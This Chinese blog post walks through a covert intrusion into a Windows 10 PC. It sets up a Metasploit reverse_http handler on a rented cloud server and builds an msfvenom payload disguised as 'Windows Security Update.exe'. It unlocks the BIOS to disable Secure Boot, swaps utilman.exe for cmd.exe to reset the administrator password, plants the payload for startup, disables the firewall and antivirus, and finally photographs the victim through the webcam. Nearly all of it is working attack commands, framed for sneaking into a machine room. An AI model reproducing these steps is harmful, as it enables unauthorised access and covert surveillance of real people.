admin 管理员组文章数量: 887016
简介
网上看到有人发布的关于win10的入侵流程,正好手上有两台电脑,大致说一下我的思路吧
原理
原理其实都是差不多的,即想办法把你的后门植入系统,然后远程控制。随着win10越来越安全,如果对方防备完善的话,
防火墙全开,远程端口默认禁止,附带杀毒软件,那么很难不通过物理接触感染系统。这里的思路利用win10的secure boot
提权然后拿到Administrator帐号进行入侵
步骤
简要分为以下几个步骤:
1.制作2块USB
2.物理接触主机,获得Admin权限
3.进入系统植入后门
4.入侵完成,拔出USB溜之大吉
5.远程控制,享受入侵的福利
准备
两台电脑,一台Linux,一台win10, Linux是攻击者,win10是靶机
这里不建议直接用入侵电脑控制靶机,因为会暴露目标。推荐Ali或者Amazon,GCP去租一台免费云服务器,如果
是Amazon的话学生每年有100$的免费配额可以使用,用EDU邮箱注册即可
SSH连到云服务器,安装MSF:
curl https://raw.githubusercontent/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
sudo chmod 755 msfinstall
sudo ./msfinstall
安装screen:
sudo apt-get install screen
生成一个脚本文件:
touch automate.rc
sudo nano automate.rc
输入以下内容:
use multi/handler
set payload windows/meterpreter/reverse_http
set LHOST *你的IP*
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j
然后ctrl + x退出,y保存
这里把TCP数据包传输到异常端口(4444,5555)来躲避DPI(deep packet inspection) (注:这里面对win10最新版本是没有用的,实际还需要手动关闭防火墙和网络端口保护)
打开MSF:
sudo msfconsole
然后就看到经典的logo了,输入以下代码生成payload:
msfvenom --encoder cmd/powershell_base64 --payload windows/meterpreter/reverse_http LHOST=*你的IP* LPORT=4444 --arch x86 --platform win --format exe --out ~/'Windows Security Update.exe'
这个payload会以正常安全更新的exe伪装,从而达到规避用户注意的效果
把这个exe文件用ftp拉到本地,然后拷到USB1 上
去MS官网下载windows installation media,然后烧录到USB2 上
攻击
月黑风高之夜,你披着一件纯黑的夜行衣,在利用社会工程学后成功来到了机房。面对满眼的机器,你既没有用户账户也没有密码。你接近一台主机,重启后狂按F12切到BIOS设置页面,发现需要输入密码才能解锁BIOS…
你不慌不忙,很快打开https://bios-pw/, 然后输入机器序列号,这就解锁了,于是你把secure boot关掉,保存设置后关机
插上USB2,启动按F12选择USB boot,然后顺理成章的进入了系统安装界面(蓝色屏幕),这时候不要继续:
shift + F10
调出CMD,发现是X:,于是:
cd C:
cd windows\system32
dir
确认有一个文件叫做utilman.exe,这个文件本来是可以在开机登录界面用的,用来调节亮度等信息,普通用户也可以接触
输入:
mv utilman.exe utilman.exe.bak
cp cmd.exe utilman.exe
覆盖掉原文件,原来的utilman文件备份起来
重新正常启动,然后进入win10登录页面,点击右下角的ease of access,奇迹出现了,弹出一个cmd对话框,而且还是管理员权限的
输入:
net user administrator *password*
注意替换password,就重设了默认管理员的密码,登进去
插入USB1,把Windows Security Update.exe放到start menu/program下
关闭防火墙和杀毒软件,关闭网络和端口保护
然后把utilman复原:
打开管理员cmd
mv utilman.exe.bak utilman.exe
关机,拔出USB溜之大吉
入侵后
主机已经成功被你入侵,ssh连到云服务器,然后输入:
sudo screen msfconsole -r ~/automate.rc
进行监听
假设对方完全不知道自己被入侵,于是打开电脑,这时候云服务器输入:
sessions
可以看到有一个对应的Id以及对应的IPV4地址
输入:
sessions -i 1
选择第一个目标
然后就可以拿到shell了
webcam_list
会列出摄像头列表
webcam_snap -i 1 -v false
用第一个摄像头拍照,照片就存储在云服务器上
本文标签: 实战
版权声明:本文标题:实战:入侵win10 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1727257463h1090093.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论